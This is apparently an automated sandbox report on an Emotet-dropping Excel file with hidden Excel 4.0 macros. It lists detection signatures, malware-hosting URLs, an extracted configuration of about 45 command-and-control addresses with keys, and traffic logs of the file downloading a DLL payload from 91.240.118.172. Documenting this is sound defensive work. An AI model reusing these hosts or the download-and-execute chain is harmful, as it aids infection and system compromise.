Windows Analysis Report
CJ68000754184.xls

Overview

General Information

Sample Name: CJ68000754184.xls
Analysis ID: 562418
MD5: 84edef677d286111cb0ef9d53e0d51df
SHA1: 19548ae67f6ffec8a1c2cb9b768cb1e64d29dbcb
SHA256: 081b5ea7f6d4ce96c9c97811785f86a68809a51eaadba0928406f562ec8ea58a
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://maxtdeveloper.com/okw9yx/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/ Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/PE3 Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/f Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3 Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3 Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/ Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.png Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-adm Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/ Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/ Avira URL Cloud: Label: malware
Source: http://hostfeeling.com Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/ Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/ Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3 Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/PE3 Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3 Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/PE3 Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/ Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/9 Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/PE3 Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/ Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/ Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/ Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/ Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/ Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-cont Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3 Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/ Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html Avira URL Cloud: Label: malware
Found malware configuration
Source: 12.2.rundll32.exe.1b0000.1.unpack Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Multi AV Scanner detection for submitted file
Source: CJ68000754184.xls Virustotal: Detection: 13% Perma Link
Source: CJ68000754184.xls ReversingLabs: Detection: 18%
Multi AV Scanner detection for domain / URL
Source: hostfeeling.com Virustotal: Detection: 10% Perma Link
Machine Learning detection for dropped file
Source: C:\ProgramData\JooSee.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: >ystem.pdbW source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 12_2_10021854

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: hostfeeling.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 160.16.102.168:80
Source: Malware configuration extractor IPs: 131.100.24.231:80
Source: Malware configuration extractor IPs: 200.17.134.35:7080
Source: Malware configuration extractor IPs: 207.38.84.195:8080
Source: Malware configuration extractor IPs: 212.237.56.116:7080
Source: Malware configuration extractor IPs: 58.227.42.236:80
Source: Malware configuration extractor IPs: 104.251.214.46:8080
Source: Malware configuration extractor IPs: 158.69.222.101:443
Source: Malware configuration extractor IPs: 192.254.71.210:443
Source: Malware configuration extractor IPs: 46.55.222.11:443
Source: Malware configuration extractor IPs: 45.118.135.203:7080
Source: Malware configuration extractor IPs: 107.182.225.142:8080
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 104.168.155.129:8080
Source: Malware configuration extractor IPs: 195.154.133.20:443
Source: Malware configuration extractor IPs: 159.8.59.82:8080
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 45.142.114.231:8080
Source: Malware configuration extractor IPs: 41.76.108.46:8080
Source: Malware configuration extractor IPs: 203.114.109.124:443
Source: Malware configuration extractor IPs: 50.116.54.215:443
Source: Malware configuration extractor IPs: 209.59.138.75:7080
Source: Malware configuration extractor IPs: 185.157.82.211:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 162.214.50.39:7080
Source: Malware configuration extractor IPs: 138.185.72.26:8080
Source: Malware configuration extractor IPs: 178.63.25.185:443
Source: Malware configuration extractor IPs: 51.15.4.22:443
Source: Malware configuration extractor IPs: 81.0.236.90:443
Source: Malware configuration extractor IPs: 216.158.226.206:443
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Malware configuration extractor IPs: 162.243.175.63:443
Source: Malware configuration extractor IPs: 212.237.17.99:8080
Source: Malware configuration extractor IPs: 45.118.115.99:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.214.173.220:8080
Source: Malware configuration extractor IPs: 178.79.147.66:8080
Source: Malware configuration extractor IPs: 176.104.106.96:8080
Source: Malware configuration extractor IPs: 51.38.71.0:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 212.24.98.99:8080
Source: Malware configuration extractor IPs: 159.89.230.105:443
Source: Malware configuration extractor IPs: 79.172.212.216:8080
Source: Malware configuration extractor IPs: 212.237.5.209:443
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 20:18:49 GMTServer: Apache/2.4.6 (CentOS) PHP/7.4.27X-Powered-By: PHP/7.4.27Set-Cookie: 61f44fa975c8c=1643401129; expires=Fri, 28-Jan-2022 20:19:49 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:18:49 GMTExpires: Fri, 28 Jan 2022 20:18:49 GMTContent-Disposition: attachment; filename="KfCx9N.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 21
Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000002.445696631.0000000000396000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.441775503.00000000002F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html
Source: CJ68000754184.xls.0.dr String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
Source: mshta.exe, 00000004.00000002.445452336.0000000000260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.html_
Source: mshta.exe, 00000004.00000002.445492110.000000000029E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlb
Source: mshta.exe, 00000004.00000003.420330399.00000000002E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmld
Source: mshta.exe, 00000004.00000003.423260829.00000000032DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.422456833.00000000032D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000002.446063365.00000000039DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmll
Source: mshta.exe, 00000004.00000002.445452336.0000000000260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.445509209.00000000002BB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443936246.00000000002B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.p
Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.png
Source: powershell.exe, 00000006.00000002.684983623.000000000362E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/libraries/8s/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-adm
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.suk
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-cont
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
Source: powershell.exe, 00000006.00000002.685196853.00000000037CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/asset
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/f
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
Source: powershell.exe, 00000006.00000002.685146256.0000000003785000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
Source: powershell.exe, 00000006.00000002.677562211.00000000002AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.677314579.0000000000260000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://w
Source: powershell.exe, 00000006.00000002.677562211.00000000002AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.420738023.0000000003A2C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: mshta.exe, 00000004.00000002.446348661.0000000003CAA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/
Source: mshta.exe, 00000004.00000003.441443397.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420217264.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446302477.0000000003AAE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/ll
Source: mshta.exe, 00000004.00000003.441588224.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446294886.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420167396.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443804667.0000000003A9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/r
Source: mshta.exe, 00000004.00000003.420287820.0000000003A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.comP
